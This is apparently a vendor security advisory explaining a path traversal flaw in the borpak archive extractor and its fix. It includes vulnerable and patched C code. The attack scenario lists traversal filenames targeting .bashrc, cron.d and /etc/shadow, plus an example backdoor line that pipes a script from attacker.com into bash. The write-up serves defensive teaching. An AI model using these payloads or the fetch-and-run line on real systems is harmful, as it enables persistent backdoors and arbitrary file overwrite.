Medium severity · 5 min read

How path traversal happens in C file extraction and how to fix it

A path traversal vulnerability in the borpak archive extraction tool allowed attackers to write files to arbitrary locations on the filesystem by crafting malicious .pak archives with `../` sequences in filenames. This medium-severity issue in `tools/borpak/source/borpak.c` could enable system compromise by overwriting critical files such as `.bashrc` or cron jobs. The fix adds path validation that rejects entries whose paths would escape the intended extraction directory.

By Orbis AppSec
Published June 7, 2026 · Reviewed June 7, 2026

Answer Summary

Path traversal (CWE-22) in C file extraction occurs when archive filenames containing `../` sequences are used without sanitization, allowing writes outside the target directory. In borpak.c, the fix joins the extraction root and the entry name, resolves the result with `realpath()`, and accepts it only if it starts with the resolved root. When the target does not exist yet (so `realpath()` fails), it falls back to rejecting names that contain traversal patterns such as `../`, `..\`, and URL-encoded `%2e%2e`.

Vulnerability at a Glance

CWE: CWE-22
Fix: Validate extracted paths stay within the declared extraction root directory
Risk: Arbitrary file write leading to system compromise
Language: C
Root cause: Filenames from .pak archives used directly without path sanitization
Vulnerability: Path Traversal (Directory Traversal)

Introduction

The borpak tool extracts .pak archive files: it reads each filename stored in the archive and creates a matching output file. A flaw at line 302 of tools/borpak/source/borpak.c let attackers escape the intended extraction directory entirely. During extraction, the code used memcpy to copy filenames directly from the archive without any sanitization, so a malicious archive containing ../../../etc/cron.d/malicious as a filename would be written outside the extraction directory, potentially into /etc/cron.d.

This vulnerability is particularly dangerous because archive extraction is often performed with elevated privileges or in automated pipelines. A developer downloading and extracting a seemingly innocent game mod or resource pack could unknowingly compromise their account, or the whole system if the extraction runs as root.

The Vulnerability Explained

When borpak extracts files from a .pak archive, it reads the filename stored in the archive header and uses it to construct the output path. The original code performed something like:

// Vulnerable pattern in borpak.c:302
char output_path[4096];
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
// pak_entry->filename comes directly from the archive with no validation
FILE *out = fopen(output_path, "wb");

The problem? The pak_entry->filename is attacker-controlled data read directly from the archive. An attacker crafting a malicious .pak file could include entries like:

  • ../../../etc/passwd - Overwrite the system password file (if extraction runs as root)
  • ../../home/user/.bashrc - Inject malicious shell commands
  • ../../../etc/cron.d/backdoor - Install a persistent backdoor
  • ....//....//etc/shadow - Bypass filters that strip ../ in a single pass, since removing ../ from ....// leaves ../
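To see why `....//` appears in that list, consider a deliberately naive filter that deletes each `../` it finds in one left-to-right pass and never re-scans its output. The sketch below is hypothetical (strip_dotdot_once() is an illustrative name, not code from borpak); it shows that the deletion itself reassembles the traversal sequence:

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical, deliberately naive filter: removes every "../" it finds
 * in a single left-to-right pass, without re-scanning what it produced. */
static void strip_dotdot_once(const char *in, char *out, size_t outsz)
{
    size_t j = 0;
    while (*in != '\0' && j + 1 < outsz) {
        if (strncmp(in, "../", 3) == 0)
            in += 3;              /* drop the match and move on */
        else
            out[j++] = *in++;     /* copy everything else verbatim */
    }
    out[j] = '\0';
}
```

Calling `strip_dotdot_once("....//....//etc/shadow", buf, sizeof buf)` leaves `../../etc/shadow` in `buf`: each `....//` loses its middle `../` and collapses into exactly the sequence the filter was meant to remove.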

Real Attack Scenario

Imagine a game modding community where users share .pak files containing textures and models. An attacker creates a mod called "HD_Textures.pak" with these entries:

textures/grass.png          (legitimate file)
textures/stone.png          (legitimate file)
../../../home/user/.bashrc  (malicious payload)

When a user runs borpak -x HD_Textures.pak -d ./mods/ from their home directory, the tool extracts the textures normally, but the third entry resolves to ~/.bashrc and the tool overwrites it with attacker-supplied content such as:

curl http://attacker.com/shell.sh | bash &

The next time the user opens a terminal, the backdoor executes.
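The attacker does not need to know how deep the extraction directory is: surplus `../` components are harmless because `/..` is `/` itself. A small lexical normalizer makes this concrete. It is a hypothetical helper that collapses `.` and `..` purely as text (unlike realpath(), it ignores symlinks), applied here to the joined path from the scenario, assuming the user extracts into /home/user/mods:

```c
#include <string.h>

/* Collapse "." and ".." components of an absolute path as text only.
 * Returns 0 on success, -1 if the path is not absolute or too long. */
static int lexical_normalize(const char *path, char *out, size_t outsz)
{
    char buf[4096];
    const char *parts[512];
    size_t n = 0;

    if (path[0] != '/' || strlen(path) >= sizeof(buf) || outsz < 2)
        return -1;
    strcpy(buf, path);

    for (char *tok = strtok(buf, "/"); tok != NULL; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;                     /* "." stays in the same directory */
        if (strcmp(tok, "..") == 0) {
            if (n > 0)
                n--;                      /* ".." pops one level; "/.." stays "/" */
            continue;
        }
        if (n == sizeof(parts) / sizeof(parts[0]))
            return -1;
        parts[n++] = tok;
    }

    /* Rebuild "/a/b/c" from the remaining components */
    size_t len = 0;
    out[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        size_t plen = strlen(parts[i]);
        if (len + 1 + plen + 1 > outsz)
            return -1;
        out[len++] = '/';
        memcpy(out + len, parts[i], plen);
        len += plen;
        out[len] = '\0';
    }
    if (n == 0) {
        out[0] = '/';
        out[1] = '\0';
    }
    return 0;
}
```

Normalizing `/home/user/mods/../../../home/user/.bashrc` yields `/home/user/.bashrc`, and adding extra `../` components (for example six instead of three before `etc/cron.d/backdoor`) still lands on `/etc/cron.d/backdoor`.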

The Fix

The fix adds a path_stays_within_root() validation function that rejects entries whose joined path resolves outside the intended directory. Here is the security logic added:

#include <stdio.h>    /* snprintf() */
#include <stdlib.h>   /* realpath(), free() */
#include <string.h>   /* strlen(), strncmp(), strstr() */

static int path_stays_within_root(const char *root, const char *filename)
{
    char combined[4096];

    /* Join the extraction root and the name read from the archive */
    snprintf(combined, sizeof(combined), "%s/%s", root, filename);

    /* Canonicalize the extraction root itself */
    char *rp = realpath(root, NULL);
    if (!rp) return 0;

    /* realpath() collapses ../ and follows symlinks, but it only
     * succeeds when the target already exists */
    char *res = realpath(combined, NULL);
    if (res) {
        /* Plain prefix comparison: a root of /srv/out also matches /srv/out2 */
        int contained = (strncmp(res, rp, strlen(rp)) == 0);
        free(res);
        free(rp);
        return contained;
    }

    /* Target does not exist yet: fall back to a string-based check
     * ("....//" already contains "../", so that last test is redundant) */
    int has_traversal = (strstr(filename, "../") != NULL ||
                         strstr(filename, "..\\") != NULL ||
                         strstr(filename, "%2e%2e") != NULL ||
                         strstr(filename, "....//") != NULL);
    free(rp);
    return !has_traversal;
}

Key Security Improvements

  1. Path Resolution: Uses realpath() to resolve the combined path, collapsing ../ sequences and following symbolic links; this applies only when the target already exists, because realpath() returns NULL otherwise
  2. Containment Check: Verifies the resolved path starts with the canonical extraction root directory (a plain strncmp() prefix comparison)
  3. Pattern Detection: Falls back to string-based detection of traversal patterns when the file does not exist yet
  4. Multiple Encoding Coverage: Catches ../, ..\ (Windows separators), URL-encoded %2e%2e (lowercase only), and double-dot variations like ....//
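Comparing only strlen(root) characters also accepts sibling directories that merely share the root's prefix. A minimal sketch of a boundary-aware comparison, assuming both arguments are already canonical realpath() results (the function names and the /srv/out paths are illustrative, not from borpak):

```c
#include <string.h>

/* The comparison used by the fix: a plain prefix test */
static int naive_prefix_contained(const char *root, const char *resolved)
{
    return strncmp(resolved, root, strlen(root)) == 0;
}

/* Boundary-aware variant: the match must end at '/' or at the end of
 * the resolved path, so "/srv/out2" is not treated as inside "/srv/out". */
static int boundary_contained(const char *root, const char *resolved)
{
    size_t n = strlen(root);
    if (strncmp(resolved, root, n) != 0)
        return 0;
    if (n == 1 && root[0] == '/')     /* every absolute path is under "/" */
        return 1;
    return resolved[n] == '/' || resolved[n] == '\0';
}
```

With a root of `/srv/out`, the naive test accepts `/srv/out2/payload` while the boundary-aware one rejects it; both accept `/srv/out/textures/grass.png`.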

Before vs After

Before (Vulnerable):

// pak_entry->filename used directly - DANGEROUS
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
fopen(output_path, "wb");

After (Secure):

// Validate path stays within extraction directory
if (!path_stays_within_root(extract_dir, pak_entry->filename)) {
    fprintf(stderr, "Error: Path traversal detected in '%s'\n", pak_entry->filename);
    continue; // Skip malicious entry
}
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
fopen(output_path, "wb");

Prevention & Best Practices

1. Never Trust Archive Contents

Archive filenames, sizes, and metadata are all attacker-controlled. Treat them as untrusted input:

// Always validate before use
if (contains_path_traversal(filename) || strlen(filename) > MAX_FILENAME) {
    reject_entry();
}
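The snippet above relies on helpers the article does not define. One hypothetical way to write contains_path_traversal() is to split the name into components on both / and \ and flag any component that is exactly `..`, plus absolute and drive-letter names. Because it inspects components instead of rewriting the string, `....` is treated as an ordinary (if odd) directory name rather than being turned into `..`. It does no URL decoding, so if the tool decodes `%2e` sequences anywhere, the check must run after decoding:

```c
#include <stdbool.h>
#include <string.h>

/* Hypothetical helper: true if an archive entry name could climb out of
 * the extraction directory. Splits on both '/' and '\\' so Windows-style
 * separators are covered, and rejects absolute names. */
static bool contains_path_traversal(const char *name)
{
    if (name[0] == '/' || name[0] == '\\')
        return true;                      /* absolute path */
    if (name[0] != '\0' && name[1] == ':')
        return true;                      /* drive letter, e.g. "C:" */

    const char *seg = name;               /* start of the current component */
    for (const char *p = name; ; p++) {
        if (*p == '/' || *p == '\\' || *p == '\0') {
            size_t len = (size_t)(p - seg);
            if (len == 2 && seg[0] == '.' && seg[1] == '.')
                return true;              /* a ".." component */
            if (*p == '\0')
                break;
            seg = p + 1;
        }
    }
    return false;
}
```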

2. Use Canonical Path Comparison

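Always resolve paths to their canonical form before comparing them, treat a failed realpath() as a rejection (it returns NULL for paths that do not exist), and require the match to end on a directory boundary:

char *canonical_root = realpath(extract_dir, NULL);
char *canonical_file = realpath(full_path, NULL);   // NULL if full_path does not exist
size_t n = canonical_root ? strlen(canonical_root) : 0;
if (!canonical_root || !canonical_file ||
    strncmp(canonical_file, canonical_root, n) != 0 ||
    (canonical_file[n] != '/' && canonical_file[n] != '\0')) {
    // Path escapes root or could not be resolved - reject
}
free(canonical_root);
free(canonical_file);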
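Because realpath() returns NULL for a file that has not been written yet, one option is to canonicalize the parent directory instead and require the last component to be a plain name. A minimal sketch, assuming parent directories are created (and themselves checked) before each file is written; new_file_stays_within_root() is a hypothetical name, not part of borpak:

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* expose realpath() under strict C modes */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: returns 1 if root/relpath would be created inside
 * root. Canonicalizes the parent directory (which must already exist)
 * rather than the file itself, so it works before the file is written. */
static int new_file_stays_within_root(const char *root, const char *relpath)
{
    char joined[4096];
    int w = snprintf(joined, sizeof joined, "%s/%s", root, relpath);
    if (w < 0 || (size_t)w >= sizeof joined)
        return 0;                            /* truncated path: reject */

    /* The format string guarantees at least one '/' in joined */
    const char *base = strrchr(joined, '/') + 1;
    if (*base == '\0' || strcmp(base, ".") == 0 || strcmp(base, "..") == 0)
        return 0;                            /* last component must be a file name */

    char parent[4096];
    size_t plen = (size_t)(base - joined);   /* keeps the trailing '/' */
    memcpy(parent, joined, plen);
    parent[plen] = '\0';

    char *canon_root = realpath(root, NULL);
    char *canon_parent = realpath(parent, NULL);
    int ok = 0;
    if (canon_root != NULL && canon_parent != NULL) {
        size_t n = strlen(canon_root);
        /* Boundary-aware containment of the parent directory */
        ok = strncmp(canon_parent, canon_root, n) == 0 &&
             (canon_parent[n] == '/' || canon_parent[n] == '\0' ||
              (n == 1 && canon_root[0] == '/'));
    }
    free(canon_root);
    free(canon_parent);
    return ok;
}
```

This only vets directories. If a symlink already sits at the final component, fopen() will follow it; on POSIX systems, opening with open() and O_CREAT | O_EXCL fails with EEXIST instead of following such a link.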

3. Consider Allowlisting

For known archive formats, validate filenames against expected patterns:

// Only allow alphanumeric, dots, slashes (no backslashes or special chars)
if (!is_valid_filename_pattern(filename)) {
    reject_entry();
}
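is_valid_filename_pattern() is only named, not defined, in the snippet above. A minimal sketch of one possible allowlist, assuming entry names are plain ASCII with / as the only separator. Note that an allowlist permitting dots and slashes must still reject `.` and `..` components, or `../` slips through:

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical allowlist: ASCII letters, digits, '.', '_' and '-' inside
 * components, '/' only as a separator. Empty, "." and ".." components
 * are rejected. */
static bool is_valid_filename_pattern(const char *name)
{
    size_t seg_len = 0;   /* characters in the current component */
    size_t dots = 0;      /* how many of them are '.' */

    for (const char *p = name; ; p++) {
        char c = *p;
        if (c == '/' || c == '\0') {
            /* Empty component: leading '/', "//", trailing '/', or "" */
            if (seg_len == 0)
                return false;
            /* A component made only of one or two dots: "." or ".." */
            if (seg_len == dots && dots <= 2)
                return false;
            if (c == '\0')
                return true;
            seg_len = dots = 0;
            continue;
        }
        bool allowed = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                       (c >= '0' && c <= '9') ||
                       c == '.' || c == '_' || c == '-';
        if (!allowed)
            return false;             /* backslashes, ':', '%', spaces, ... */
        if (c == '.')
            dots++;
        seg_len++;
    }
}
```

Rejecting `%` outright also sidesteps the question of whether any layer URL-decodes names.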

4. Use Secure Extraction Libraries

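Libraries such as libarchive can enforce these checks during extraction, but only when asked: archive_read_extract() refuses entries containing .. components with ARCHIVE_EXTRACT_SECURE_NODOTDOT, entries that would be redirected through an on-disk symlink with ARCHIVE_EXTRACT_SECURE_SYMLINKS, and absolute paths with ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS:

archive_read_extract_set_skip_file(a, dev, ino);  // skip the archive file itself (dev/ino from stat())
archive_read_extract(a, entry, ARCHIVE_EXTRACT_SECURE_NODOTDOT |
                               ARCHIVE_EXTRACT_SECURE_SYMLINKS |
                               ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS);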

Key Takeaways

  • Archive filenames are attacker-controlled: The pak_entry->filename in borpak came directly from the archive without any validation
  • realpath() is essential for path validation: String-based checks alone miss edge cases; always resolve to canonical paths
  • Check multiple traversal encodings: Attackers use ../, ..\, %2e%2e, ....//, and Unicode variants
  • Extraction tools need defense-in-depth: Pair a filename-level check with containment verification of the resolved path, so an escape missed by one layer is caught by the other
  • Regression tests with attack payloads are critical: The new test suite covers ../../../etc/passwd, ....// variations, and URL-encoded attacks

How Orbis AppSec Detected This

  • Source: Filename data read from .pak archive entries via memcpy in borpak.c
  • Sink: fopen() and file write operations at tools/borpak/source/borpak.c:302 using unsanitized paths
  • Missing control: No validation that constructed file paths stayed within the extraction directory
  • CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
  • Fix: Added path_stays_within_root() function that validates paths using realpath() resolution and pattern detection for traversal sequences

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

Path traversal in archive extraction is a classic vulnerability that continues to affect modern codebases. The borpak fix demonstrates the core approach: resolve paths to their canonical form, verify containment within the intended directory, and catch multiple encoding variations of traversal sequences. When handling any archive format, whether .pak, .zip, .tar, or others, always treat filenames as untrusted input and validate them before writing.


Frequently Asked Questions

What is path traversal?

Path traversal is a vulnerability where attackers manipulate file paths using sequences like `../` to access or write files outside intended directories, potentially compromising system files.

How do you prevent path traversal in C?

Validate paths by resolving them with `realpath()`, checking for traversal sequences (`../`, `..\`, URL-encoded variants), and verifying that the resolved path lies inside the intended root directory (compare up to a `/` boundary, not just a string prefix).

What CWE is path traversal?

CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) covers path traversal vulnerabilities.

Is checking for `../` enough to prevent path traversal?

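No. Attackers use variations like `..\` (on systems that treat backslash as a separator), `....//` (which defeats filters that strip `../` only once), URL-encoded `%2e%2e%2f` (where some layer decodes names), and Unicode representations. You must normalize paths and verify containment after resolution.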

Can static analysis detect path traversal?

Yes, static analysis tools can detect path traversal by tracking tainted input from archive filenames to file operations and flagging missing sanitization.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #346
